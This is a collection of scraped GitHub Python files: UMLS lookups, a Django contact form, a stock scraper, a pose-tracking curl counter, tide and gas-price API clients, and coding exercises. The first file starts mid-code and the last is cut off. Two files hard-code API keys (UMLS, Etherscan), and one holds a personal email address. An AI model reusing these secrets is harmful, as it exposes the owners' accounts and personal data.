\"SNOMEDCT_US\"\r\n r = requests.get(uri + content_endpoint, params=query)\r\n r.encoding = 'utf-8'\r\n items = json.loads(r.text)\r\n jsonData = items[\"result\"]\r\n return jsonData\r\n\r\n\r\ndef semantic_type(CUI):\r\n jsonData = []\r\n apikey = \"69d2ad47-8307-4f4c-b0aa-dfa5fbeae47e\"\r\n uri = \"https://uts-ws.nlm.nih.gov\"\r\n content_endpoint = \"/rest/content/current/CUI/\"\r\n # get at ticket granting ticket for the session\r\n AuthClient = Authentication(apikey)\r\n tgt = AuthClient.gettgt()\r\n # generate a new service ticket for each page if needed\r\n ticket = AuthClient.getst(tgt)\r\n # construct the RESTful API command variable\r\n query = {'ticket': ticket}\r\n r = requests.get(uri + content_endpoint + CUI, params=query)\r\n r.encoding = 'utf-8'\r\n items = json.loads(r.text)\r\n for i in range(len(items[\"result\"][\"semanticTypes\"])):\r\n jsonData.append(items[\"result\"][\"semanticTypes\"][i][\"name\"])\r\n return jsonData\r\n\r\n\r\ndef umls_semantic(entities, wname):\r\n with open(wname, \"w\") as w:\r\n path = Path().absolute()\r\n print(\" Retrieving UMLS info for matches...\")\r\n entity_list = []\r\n for entity in entities:\r\n umls_data = get_ulms_info(entity)\r\n for result in umls_data[\"results\"]:\r\n print(entity)\r\n if umls_data[\"results\"][0][\"ui\"] != \"NONE\":\r\n print(result[\"ui\"] + \"|\" + result[\"name\"] + \"|\" + result[\"rootSource\"])\r\n w.write(result[\"ui\"] + \"|\" + result[\"name\"] + \"|\" + result[\"rootSource\"] + \"\\n\")\r\n for semanticType in semantic_type(result[\"ui\"]):\r\n if semanticType == \"Disease or Syndrome\":\r\n entity_list.append(entity)\r\n print(\" Disease or Syndrome - found\")\r\n w.write(\" Disease or Syndrome - found\\n\")\r\n else:\r\n print(\" \" + semanticType)\r\n w.write(\" \" + semanticType + \"\\n\")\r\n entity_list = list(dict.fromkeys(entity_list))\r\n print(\"Saved UMLS Concepts to file \" + str(path.as_posix()) + \"/\" + wname)\r\n print(\"List of diseases/syndromes, duplicates removed\")\r\n print(entity_list)\r\n return entity_list\r\n\r\n\r\n# For each of the disease/syndrome items, obtain the Wikipedia summary information and open the Wikipedia web page.\r\n# For each of the concepts that are \"Disease or Syndrome\", obtain information from Wikipedia using the Wikipedia API.\r\n# Write the Wikipedia entry's 'summary' to a .txt file named for the drug and launch the default desktop web browser\r\n# to access the relevant Wikipedia page.\r\ndef getWikiSummary (entity_list):\r\n print(\" Retrieving Wikipedia entries for:\\n Writing Wikipedia info to files and opening browser pages...\")\r\n print(str(Path().absolute().as_posix()))\r\n for entity in entity_list:\r\n with open('{}.txt'.format(entity), \"w\", encoding=\"utf-8\") as w:\r\n wikiSummary = wikipedia.summary(entity, auto_suggest=False)\r\n page = wikipedia.page(entity,auto_suggest=False).url\r\n print(wikiSummary)\r\n w.write(wikiSummary)\r\n webbrowser.open_new_tab(page)\r\n\r\n\r\nrfile = \"L3.csv\"\r\nwfile = \"SpacyEntities.txt\"\r\nentityList = entities(wfile, rfile)\r\nwfile2 = \"UMLS_Concepts.txt\"\r\numls = umls_semantic(entityList, wfile2)\r\ngetWikiSummary(umls)\r\nprint('Done!')","repo_name":"justinslee30/MED277","sub_path":"L3/Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72602946802","text":"from django.contrib import messages\nfrom django.shortcuts import redirect\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\ndef mailSubmit(request):\n\n if request.method == \"POST\":\n name= request.POST.get('name')\n companyName= request.POST.get('companyName')\n telephone= request.POST.get('telephone')\n email= request.POST.get('email')\n message= request.POST.get('message')\n text=f\"Yeni başvuru bilgileri adı: {name} şirket ismi: {companyName} telefon numarası: {telephone} eposta adresi: {email} messagı: {message}\"\n title='Yeni Başvuru Var!'\n hostEmail = settings.EMAIL_HOST_USER\n sendTo='shamsadinlo@gmail.com'\n\n try:\n send_mail(title, text, hostEmail ,[sendTo],fail_silently=False)\n messages.info(request, 'Mesajiniz başarılı bir şekilde gönderildi!')\n except:\n message.error(request,'Bir hata uluştu lütfen tekrar deneyiniz!')\n","repo_name":"berkansems/our_website","sub_path":"s4in/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"3533505248","text":"\n\n# with open('aula30.txt', 'w') as arquivo:\n# ...\n\nclass MyOpen:\n\n def __init__(self, caminho_arquivo, modo):\n print('INIT')\n self.caminho_arquivo = caminho_arquivo\n self.modo = modo\n self._arquivo = None\n\n def __enter__(self):\n print('Abrindo arquivo')\n self._arquivo = open(self.caminho_arquivo, self.modo, encoding='utf8')\n return self._arquivo\n\n def __exit__(self, class_exception, exception_, traceback_):\n print('Fechando arquivo')\n self._arquivo.close()\n\n raise class_exception(*exception_.args)\n\n print(class_exception)\n print(exception_)\n print(traceback_)\n\n return True\n\n\ninstancia = MyOpen('aula30.txt', 'w')\nwith instancia as arquivo:\n arquivo.write('Line 1\\n')\n arquivo.write('Line 2\\n', 123)\n arquivo.write('Line 3\\n')\n print('WITH', arquivo)\n","repo_name":"nathangazon/Section5OrientacaoObjetos","sub_path":"aula30.py","file_name":"aula30.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30532193275","text":"# needed for python unit testings\n# https://docs.python.org/3/library/unittest.html\nimport unittest\n\n# required for type hinting\n# https://mypy.readthedocs.io/en/stable/cheat_sheet_py3.html\nfrom typing import List, Dict, Set, Optional\n\nclass Solution:\n '''\n Given an array asteroids of integers representing asteroids in a row.\n\n For each asteroid, the absolute value represents its size, and the sign\n represents its direction (positive meaning right, negative left). Each\n asteroid moves at the same speed.\n\n Find out the state of the asteroids after all collisions. If two asteroids\n meet, the smaller one will explode. If both are the same size, both will\n explode. Two asteroids moving in the same direction will never meet.\n '''\n def asteroidCollision(self, asteroids: List[int]) -> List[int]:\n answer = []\n stack = []\n for a in asteroids:\n if a > 0:\n stack.append(a)\n else:\n a = abs(a)\n while stack and stack[-1] < a:\n stack.pop()\n if stack and stack[-1] == a:\n stack.pop()\n elif len(stack) == 0:\n answer.append(-a)\n return answer + stack\n\nclass UnitTesting(unittest.TestCase):\n def test_one(self):\n s = Solution()\n i = [5,10,-5]\n o = [5,10]\n self.assertEqual(s.asteroidCollision(i), o)\n\n def test_two(self):\n s = Solution()\n i = [8,-8]\n o = []\n self.assertEqual(s.asteroidCollision(i), o)\n\n def test_three(self):\n s = Solution()\n i = [10,2,-5]\n o = [10]\n self.assertEqual(s.asteroidCollision(i), o)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)","repo_name":"olsenw/LeetCodeExercises","sub_path":"Python3/asteroid_collision.py","file_name":"asteroid_collision.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35888991952","text":"import requests\nimport pandas\nfrom io import StringIO\n\nimport db_connect\n\n\nclass stock_transaction:\n \"\"\"取得股票日成交資訊\n * 來源:https://data.gov.tw/dataset/11549\n * 名稱:盤後資訊 > 個股日成交資訊\n * 更新頻率:每日\n * 主要欄位:證券代號、證券名稱、成交股數、成交金額、開盤價、最高價、最低價、收盤價、漲跌價差、成交筆數\n e.g. \"00875\",\"國泰網路資安\",\n \"1,998,885\",\"51,736,728\",\"25.78\",\"25.98\",\"25.77\",\"25.98\",\n \"+0.46\",\"484\"\n \"\"\"\n\n def __init__(self) -> None:\n self.title = \"盤後資訊 > 個股日成交資訊\"\n self.url = (\n \"http://www.twse.com.tw/exchangeReport/STOCK_DAY_ALL?response=open_data\"\n )\n self.df = None # 把資料從csv轉乘datframe\n self.trade_date = \"2021-1-1\" # 交易日\n\n def _create_new_header(self, orignal_headers):\n new_headers = []\n\n for data in orignal_headers:\n if data == \"證券代號\":\n new_headers.append(\"stock_symbol\")\n elif data == \"證券名稱\":\n new_headers.append(\"stock_name\")\n elif data == \"成交股數\":\n new_headers.append(\"volume\")\n elif data == \"成交金額\":\n new_headers.append(\"total_price\")\n elif data == \"開盤價\":\n new_headers.append(\"open\")\n elif data == \"最高價\":\n new_headers.append(\"high\")\n elif data == \"最低價\":\n new_headers.append(\"low\")\n elif data == \"收盤價\":\n new_headers.append(\"close\")\n elif data == \"漲跌價差\":\n new_headers.append(\"spread\")\n elif data == \"成交筆數\":\n new_headers.append(\"transactions_number\")\n\n return new_headers\n\n def _get_and_set_df_data(self, url=None) -> bool:\n \"\"\"取得CSV內的資料,並轉成Dataframe,回傳成功與否。\n\n Args:\n param1 (str): 資料的url\n Returns:\n bool: 回傳結果. True 表示取得成功,False 表示去得失敗或是轉換失敗。\n\n \"\"\"\n if url:\n self.url = url\n\n try:\n csv = requests.get(self.url)\n df = pandas.read_csv(StringIO(csv.text)) # 有header\n # print(df) # debug\n self.df = df\n # 從檔名取得日期,檔名:STOCK_DAY_ALL_20210924.csv\n trade_date_raw = csv.headers.get(\"Content-Disposition\")[-13:-5]\n self.trade_date = (\n f\"{trade_date_raw[:4]}-{trade_date_raw[4:6]}-{trade_date_raw[6:]}\"\n )\n except Exception as exc:\n print(exc)\n return False\n\n return True\n\n def _insert_mysql(self) -> bool:\n \"\"\"Insert data into MySQL.\n\n Returns:\n bool: 回傳結果. True 表示儲存成功,False 表示儲存失敗。\n\n \"\"\"\n\n try:\n new_headers = self._create_new_header(self.df.columns)\n # df = self.df[1:] # 拿掉第一行的資料 # 這是錯的,第一行不用拿掉\n df = self.df\n df.columns = new_headers # 設定資料欄位的名稱\n print(f\"{df}\\n==={self.trade_date}===\")\n\n counter = 0 # 記錄欲新增數量\n # 建立connection物件\n my_connt_obj = db_connect.mysql_connect()\n conn = my_connt_obj.connect()\n with conn.cursor() as cursor:\n now = self.trade_date\n\n # 新增SQL語法\n for _, row in df.iterrows():\n try:\n cmd = \"\"\"INSERT IGNORE INTO DailyPrice \n (StockID, Symbol, TradeDate, OpenPrice, HighPrice,\n LowPrice, ClosePrice, Volumn)\n values(%s,%s,%s,%s,%s,%s,%s,%s);\"\"\"\n cursor.execute(\n cmd,\n (\n None,\n row.stock_symbol,\n now,\n row.open if pandas.notnull(row.open) else 0,\n row.high if pandas.notnull(row.high) else 0,\n row.low if pandas.notnull(row.low) else 0,\n row.close if pandas.notnull(row.close) else 0,\n row.volume if pandas.notnull(row.volume) else 0,\n ),\n )\n conn.commit()\n counter += 1\n except Exception as e:\n print(e)\n except Exception as exc:\n print(exc)\n return False\n\n print(f\"===Finish: {self.title}==\")\n return True\n\n def get_and_save(self, url=None):\n \"\"\"Get today transaction data and save into MySQL.\n\n Args:\n param1 (str): 資料的url\n Returns:\n bool: 回傳結果. True 表示儲存成功,False 表示沒有儲存至資料庫\n\n \"\"\"\n r = self._get_and_set_df_data(url)\n if r:\n r = self._insert_mysql()\n else:\n return False\n\n return r\n\n\n\"\"\"實作測試\"\"\"\n# test = stock_transaction()\n# r = test.get_and_save()\n# print(r)\n","repo_name":"eyelash94500/python_fin_azure","sub_path":"code/ch5/stock_transaction.py","file_name":"stock_transaction.py","file_ext":"py","file_size_in_byte":5425,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"75"} +{"seq_id":"30426699549","text":"import re\nimport json\nimport warnings\n\nfrom util import DataSource\n\ntry:\n from .bahn_credentials import BAHN_API_TOKEN\nexcept ImportError:\n warnings.warn(\"Deutsche Bahn Parking API disabled! You need to define your BAHN_API_TOKEN in bahn_credentials.py\")\n BAHN_API_TOKEN = None\n\n\nif BAHN_API_TOKEN:\n class ParkingBahn(DataSource):\n\n source_id = \"bahn-api-parken\"\n web_url = \"https://api.deutschebahn.com/bahnpark/v1/spaces/occupancies\"\n\n def download_meta_data(self):\n self.session.headers.update({\n \"Accept\": \"application/json;charset=utf-8\",\n \"Authorization\": f\"Bearer {BAHN_API_TOKEN}\"\n })\n markup = self.get_url(self.web_url)\n data = json.loads(markup)\n\n return data\n\n def download_snapshot_data(self):\n data = self.download_meta_data()\n\n parking_places = []\n for entry in data[\"allocations\"]:\n num_cur = None\n text = entry[\"allocation\"].get(\"text\")\n if text:\n num_cur = self.int_or_none(text.split)\n parking_places.append({\n \"place_name\": entry[\"space\"][\"name\"],\n \"num_all\": entry[\"allocation\"].get(\"capacity\"),\n \"num_free\": num_cur,\n\n })\n return parking_places\n\n def transform_snapshot_data(self, data):\n ret_data = []\n\n text_mapping = {\n \"bis 10\": 10,\n \"> 10\": 20,\n \"> 30\": 40,\n \"> 50\": 60,\n }\n\n try:\n data[\"allocations\"]\n except (AttributeError, KeyError, TypeError) as e:\n return ret_data\n\n for entry in data[\"allocations\"]:\n num_cur = None\n text = entry[\"allocation\"].get(\"text\")\n if text:\n num_cur = text_mapping.get(text)\n if num_cur is None:\n num_cur = self.int_or_none(text.split()[-1])\n\n ret_data.append({\n \"place_id\": self.place_name_to_id(entry[\"space\"][\"id\"]),\n \"num_all\": entry[\"allocation\"].get(\"capacity\"),\n \"num_free\": num_cur,\n })\n\n return ret_data\n\n def transform_meta_data(self, data):\n ret_data = super().transform_meta_data(None)\n try:\n data[\"allocations\"]\n except (AttributeError, KeyError, TypeError) as e:\n return ret_data\n\n for entry in data[\"allocations\"]:\n place_id = self.place_name_to_id(entry[\"space\"][\"id\"])\n place_name = entry.get(\"station\", {}).get(\"nameDisplay\") or entry[\"space\"][\"name\"]\n\n city_name = []\n title_l = entry[\"space\"][\"title\"].split()\n while title_l:\n if title_l[0].startswith(\"P\") and title_l[0][1].isdigit():\n break\n city_part = title_l.pop(0)\n if city_part not in (\"Hbf\", \"Südkreuz\") and \"bahnhof\" not in city_part:\n city_name.append(city_part)\n city_name = \" \".join(city_name)\n\n ret_data[\"places\"][place_id] = {\n \"place_id\": place_id,\n \"place_name\": place_name,\n \"num_all\": entry[\"allocation\"].get(\"capacity\"),\n \"city_name\": city_name,\n }\n\n return ret_data\n","repo_name":"defgsus/parking-scraper","sub_path":"sources/bahn.py","file_name":"bahn.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"38510136096","text":"import click\nfrom loguru import logger\n\nfrom wtb.classification.bird_classifier import BirdClassifier\n\n\n@click.command()\n@click.option(\"--image_path\", type=click.Path(exists=True))\n@click.option(\"--model_path\", type=click.Path(exists=True))\ndef predict(image_path: str, model_path: str):\n model = BirdClassifier.load_classifier(model_path)\n prediction = model.predict(image_path)\n\n logger.info(prediction)\n logger.info(model.get_human_prediction(prediction))\n\n\nif __name__ == \"__main__\":\n predict()\n","repo_name":"bigbrother-birdhouse/bird-classification","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41886672590","text":"# Вам дан словарь, состоящий из пар слов-синонимов. Повторяющихся слов в словаре нет. Напишите программу, которая для\r\n# одного данного слова определяет его синоним.\r\n#\r\n# Формат входных данных На вход программе подается количество пар синонимов n. Далее следует n строк, каждая строка\r\n# содержит два слова-синонима. После этого следует одно слово, синоним которого надо найти.\r\n#\r\n# Формат выходных данных\r\n# Программа должна вывести одно слово, синоним введенного.\r\n#\r\n# Примечание 1. Гарантируется, что синоним введенного слова существует в словаре.\r\n#\r\n# Примечание 2. Все слова в словаре начинаются с заглавной буквы.\r\n\r\nn = int(input())\r\nlis1 = dict([input().capitalize().split() for _ in range(n)])\r\nword = input().capitalize()\r\nfor key, value in lis1.items():\r\n if word == key:\r\n k = value\r\n print(k.capitalize())\r\n break\r\n if word.lower() == value:\r\n print(key)\r\n break\r\n","repo_name":"Giocatory/PyStudy","sub_path":"Dictionary_Study/synonym_dictionary.py","file_name":"synonym_dictionary.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"ru","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"32620919098","text":"def parseInput(file_name):\r\n f = open(file_name, \"r\")\r\n points = []\r\n for l in f:\r\n cur_points = l.strip().split(\"->\")\r\n cur_points = [p.split(\",\") for p in cur_points]\r\n for p in cur_points:\r\n p[0] = int(p[0])\r\n p[1] = int(p[1])\r\n points.append(cur_points)\r\n return points\r\n\r\ndef partOne(file_name):\r\n points = parseInput(file_name)\r\n grid = [[0 for i in range(1000)] for j in range(1000)]\r\n \r\n for pair_points in points:\r\n x1, y1 = pair_points[0]\r\n x2, y2 = pair_points[1]\r\n if x1 == x2:\r\n for y in range(min(y1, y2), max(y1, y2) + 1):\r\n grid[x1][y] += 1\r\n elif y1 == y2:\r\n for x in range(min(x1, x2), max(x1, x2) + 1):\r\n grid[x][y1] += 1\r\n \r\n n = 0\r\n for i in range(1000):\r\n for j in range(1000):\r\n if grid[i][j] >= 2:\r\n n += 1\r\n return n\r\n\r\n\r\ndef partTwo(file_name):\r\n points = parseInput(file_name)\r\n grid = [[0 for i in range(1000)] for j in range(1000)]\r\n \r\n for pair_points in points:\r\n x1, y1 = pair_points[0]\r\n x2, y2 = pair_points[1]\r\n if x1 == x2:\r\n for y in range(min(y1, y2), max(y1, y2) + 1):\r\n grid[x1][y] += 1\r\n elif y1 == y2:\r\n for x in range(min(x1, x2), max(x1, x2) + 1):\r\n grid[x][y1] += 1\r\n else:\r\n x, y = x1, y1\r\n while x != x2 and y != y2:\r\n grid[x][y] += 1\r\n x += int((x2 - x1) / abs(x2 - x1))\r\n y += int((y2 - y1) / abs(y2 - y1))\r\n grid[x][y] += 1\r\n \r\n n = 0\r\n for i in range(1000):\r\n for j in range(1000):\r\n if grid[i][j] >= 2:\r\n n += 1\r\n return n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(partOne(\"sample.txt\"))\r\n print(partOne(\"input.txt\"))\r\n print(partTwo(\"sample.txt\"))\r\n print(partTwo(\"input.txt\"))\r\n # print(partTwo(\"input.txt\"))\r\n","repo_name":"Martiul/Advent-of-Code","sub_path":"2021/day05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21198124538","text":"import cv2\nimport mediapipe as mp\nimport time\nimport math\nimport numpy as np\n\nclass poseDetector():\n # static_image_mode=False,\n # model_complexity=1,\n # smooth_landmarks=True,\n # enable_segmentation=False,\n # smooth_segmentation=True,\n # min_detection_confidence=0.5,\n # min_tracking_confidence=0.5):\n \n def __init__(self, static_image_mode=False, model_complexity=1, smooth_landmarks=True,enable_segmentation=False,smooth_segmentation=True,min_detection_confidence=0.5,min_tracking_confidence=0.5):\n \n self.static_image_mode = static_image_mode\n self.model_complexity = model_complexity\n self.smooth_landmarks = smooth_landmarks\n self.enable_segmentation = enable_segmentation\n self.smooth_segmentation = smooth_segmentation\n self.min_detection_confidence = min_detection_confidence\n self.min_tracking_confidence = min_tracking_confidence\n self.mpDraw = mp.solutions.drawing_utils\n self.mpPose = mp.solutions.pose\n self.pose = self.mpPose.Pose()\n self.angle_threshold = 60 # Threshold for the angle to consider as successful curl\n self.lower_threshold = 160 # Threshold for the angle to consider as successful curl\n\n def findPose(self, img, draw=True):\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n self.results = self.pose.process(imgRGB)\n if self.results.pose_landmarks:\n if draw:\n self.mpDraw.draw_landmarks(img, self.results.pose_landmarks,\n self.mpPose.POSE_CONNECTIONS)\n return img\n\n def findPosition(self, img, draw=True):\n self.lmList = []\n if self.results.pose_landmarks:\n for id, lm in enumerate(self.results.pose_landmarks.landmark):\n h, w, c = img.shape\n # print(id, lm)\n cx, cy = int(lm.x * w), int(lm.y * h)\n self.lmList.append([id, cx, cy])\n if draw:\n cv2.circle(img, (cx, cy), 5, (255, 0, 0), cv2.FILLED)\n return self.lmList\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n\n # Get the landmarks\n x1, y1 = self.lmList[p1][1:]\n x2, y2 = self.lmList[p2][1:]\n x3, y3 = self.lmList[p3][1:]\n\n # Calculate the Angle\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) -\n math.atan2(y1 - y2, x1 - x2))\n if angle > 180.0:\n angle = 360 - angle\n if angle < 0 :\n angle = -angle\n \n \n\n # print(angle)\n\n # Draw\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 3)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 3)\n cv2.circle(img, (x1, y1), 10, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 15, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 10, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 15, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 10, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 15, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 50, y2 + 50),\n cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2)\n return angle\n \n def provide_feedback(self, img, landmarks, angle, armpit_angle):\n feedback_text = \"\"\n\n # Detect relying on momentum\n if angle > self.angle_threshold and armpit_angle < self.lower_threshold:\n feedback_text += \"Avoid relying on momentum. Control the movement.\"\n\n # Detect rushing the reps\n if angle < self.angle_threshold and armpit_angle > self.angle_threshold:\n feedback_text += \"Slow down and maintain a controlled pace.\"\n\n # Detect partial range of motion\n if angle > self.angle_threshold and armpit_angle > self.angle_threshold:\n feedback_text += \"Ensure full range of motion by extending fully.\"\n\n # Detect moving elbows\n if landmarks:\n left_shoulder = landmarks[11][1:]\n right_shoulder = landmarks[12][1:]\n left_elbow = landmarks[13][1:]\n right_elbow = landmarks[14][1:]\n\n if abs(left_shoulder[1] - left_elbow[1]) > 30 or abs(right_shoulder[1] - right_elbow[1]) > 30:\n feedback_text += \"Keep your elbows stable and close to your body.\"\n\n cv2.putText(img, feedback_text, (70, 100), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2)\n\n# Modify your main lo\n \n\ndef main():\n cap = cv2.VideoCapture('PoseVideos/1.mp4')\n pTime = 0\n detector = poseDetector()\n counter = 0\n up = True\n\n while True:\n success, img = cap.read()\n landmarks = detector.findPose(img)\n lmList = detector.findPosition(landmarks, draw=False)\n \n #counter\n current_angle = detector.findAngle(landmarks, 11, 13, 15)\n armpit_angle = detector.findAngle(landmarks, 23, 11, 13)\n \n if len(lmList) != 0:\n cv2.circle(landmarks, (lmList[14][1], lmList[14][2]), 15, (0, 0, 255), cv2.FILLED)\n \n # Provide feedback\n detector.provide_feedback(img, lmList, current_angle, armpit_angle)\n\n cTime = time.time()\n fps = 1 / (cTime - pTime)\n pTime = cTime\n\n\n if current_angle < detector.angle_threshold and up:\n counter += 1\n up = False\n state = 2\n elif current_angle > detector.lower_threshold and not up:\n up = True\n state = 0\n else:\n state = 1\n\n # Display the counter value on the image\n cv2.putText(landmarks, str(counter), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (175, 175, 0), 3)\n cv2.imshow(\"Image\", landmarks)\n cv2.waitKey(1)\n\nif __name__ == \"__main__\":\n main()","repo_name":"vuxminhan/opencv-demo","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33043431943","text":"#Get GasData\r\nimport requests\r\nimport json\r\nimport time\r\nfrom apscheduler.schedulers.blocking import BlockingScheduler\r\n\r\nsched= BlockingScheduler()\r\n@sched.scheduled_job('cron', second=59, id='test_1')\r\ndef job1():\r\n r=requests.get(\"https://api.etherscan.io/api?module=gastracker&action=gasoracle&apikey=X5NGFQ256QTUSWQZVR6X9PG7GZ48UUP41A \")\r\n \r\n text=r.text\r\n jsondata=json.loads(text)\r\n\r\n print(\"LastBlock:\", jsondata['result']['LastBlock'])\r\n print(\"SafeGasPrice:\",jsondata['result']['SafeGasPrice'])\r\n print(\"FastGasPrice:\",jsondata['result']['FastGasPrice'])\r\n print(\"Execution Time:\",time.strftime(\"%H:%M:%S\"))\r\n\r\nsched.start()\r\n\r\n","repo_name":"kathy5311/TelegramBot","sub_path":"Assign1.py","file_name":"Assign1.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28636348448","text":"# -*- coding: utf-8 -*-\nfrom .tool import URLTool\n\n\nclass Storage(object):\n \"\"\"\n URL 的存储类,同时为 URL建立索引, 去重 URL\n _group_dict 根据 url 的 column 划分分组,\n key值为 column,value值为 set,set中存储 address\n \"\"\"\n\n def __init__(self):\n self._group_dict = {}\n\n def add(self, url):\n _url = URLTool(url)\n column = _url.column\n if column not in self._group_dict.keys():\n self._group_dict[column] = set()\n address = _url.address\n self._group_dict[column].add(address)\n\n def __contains__(self, url):\n _url = URLTool(url)\n column = _url.column\n if column not in self._group_dict.keys():\n return False\n address = _url.address\n if address not in self._group_dict[column]:\n return False\n return True\n","repo_name":"geekKeen/sohu_spider","sub_path":"sohu/datastructures.py","file_name":"datastructures.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71231628083","text":"kw = dict(limit=15)\n\nif starts_with is not None and search_catalog_key is not None:\n kw[search_catalog_key] = \"%s%%\" % starts_with\n\nif search_portal_type is not None:\n kw[\"portal_type\"] = search_portal_type\n\nresult_dict_list = []\nfor brain in context.portal_catalog(**kw):\n obj = brain.getObject()\n\n # There may be objects with different Portal Types, so the only way seems\n # to call the script for each object... The returned dict should only contains\n # 'label' (first line displayed) and 'description' (optional: second line displayed)\n result_dict = obj.getTypeBasedMethod('getCompletionDict',\n fallback_script_id='Base_getCompletionDict')(obj)\n\n result_dict['value'] = obj.getProperty(search_catalog_key)\n result_dict_list.append(result_dict)\n\nfrom json import dumps\nreturn dumps(result_dict_list, indent=4)\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_autocompletion_ui/SkinTemplateItem/portal_skins/erp5_autocompletion_ui/ERP5Site_getCompletionDictList.py","file_name":"ERP5Site_getCompletionDictList.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"43692170927","text":"class Solution:\n def reverseInGroups(self, arr, N, k):\n i = 0\n while i < N:\n start = i\n end = min(i + k - 1, N - 1)\n i += k\n while start < end:\n arr[start], arr[end] = arr[end], arr[start]\n start += 1\n end -= 1\n\n\nif __name__ == \"__main__\":\n nk = [int(x) for x in input().strip().split()]\n N = nk[0]\n K = nk[1]\n arr = [int(x) for x in input().strip().split()]\n\n ob = Solution()\n ob.reverseInGroups(arr, N, K)\n for i in arr:\n print(i, end=\" \")\n print()\n","repo_name":"Pyk017/Competetive-Programming","sub_path":"GFG/Arrays/Reverse Array in Groups/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"31669764684","text":"#!python3\n\n## By Elim Thompson (07/06/2020)\n##\n## This script contains util functions to download and massage data for the pyPlot Challenge. \n################################################################################################\n\n#####################################\n## Import libraries\n#####################################\nimport requests, pandas, numpy\n\n#####################################\n## Define constant\n#####################################\n## API template \napi_template = 'https://tidesandcurrents.noaa.gov/api/datagetter?' + \\\n 'begin_date={begin_date}&end_date={end_date}&station={station}&' + \\\n 'product={product}&datum={datum}&time_zone={time_zone}&units={units}&format=json'\n\ndef pull_data (params):\n\n ''' Download data from API as JSON / dictionary.\n\n input param\n -----------\n params (dict): Must contain keys: begin_date, end_date, station, product, datum, time_zone, and units\n\n output param\n ------------\n content (dict): Downloaded data from API. None if invalid API / response.\n '''\n\n # Fill in the template to get the actual API\n api = api_template.format (**params)\n # Get the response of the API\n response = requests.get (api)\n # If the status code of the response is anything but 200, return nothing\n if not response.status_code == 200:\n print ('Connection failed with {0}.'.format (response.status_code))\n return None\n \n # Get the content of the API as JSON\n content = response.json()\n response.close ()\n # If the content is an error message, something is wrong with the input params.\n # Print the error and return nothing.\n if 'error' in content:\n print ('Error encountered: {0}.'.format (content['error']['message']))\n return None\n # If no data is available, tell user to check the API itself and return nothing.\n if len (content) == 0:\n print ('Empty content encountered. Please check API:\\n{0}.'.format (api))\n return None\n \n return content\n\ndef pull_obs (station, begin_date, end_date, datum='MLLW', time_zone='gmt', units='metric'):\n\n ''' Download observed water level data from API as a dictionary\n\n input params\n ------------\n station (str) : station ID\n begin_date (str): begin date in yyyyMMdd, MM/dd/yyyy, yyyyMMdd HH:mm, or MM/dd/yyyy HH:mm\n end_date (str) : begin date in yyyyMMdd, MM/dd/yyyy, yyyyMMdd HH:mm, or MM/dd/yyyy HH:mm\n datum (str) : E.g. MSL, STND, MHW, MLLW (default), MHHW, etc\n time_zone (str) : Either GMT (default), LST, or LST_LDT\n units (str) : Either english or metric (defaut)\n\n output param\n ------------\n content (dict): Requested observation data from API. None if invalid inputs / API / response\n '''\n\n ## Put the requested parameters in a dictionary\n params = {'begin_date':begin_date, 'end_date':end_date, 'station':station,\n 'product':'water_level', 'datum':datum, 'time_zone':time_zone, 'units':units}\n ## Call pull_data to download data\n return pull_data (params)\n\ndef pull_pred (station, begin_date, end_date, datum='MLLW', time_zone='gmt', units='metric'):\n\n ''' Download predicted water level data from API as a dictionary\n\n input params\n ------------\n station (str) : station 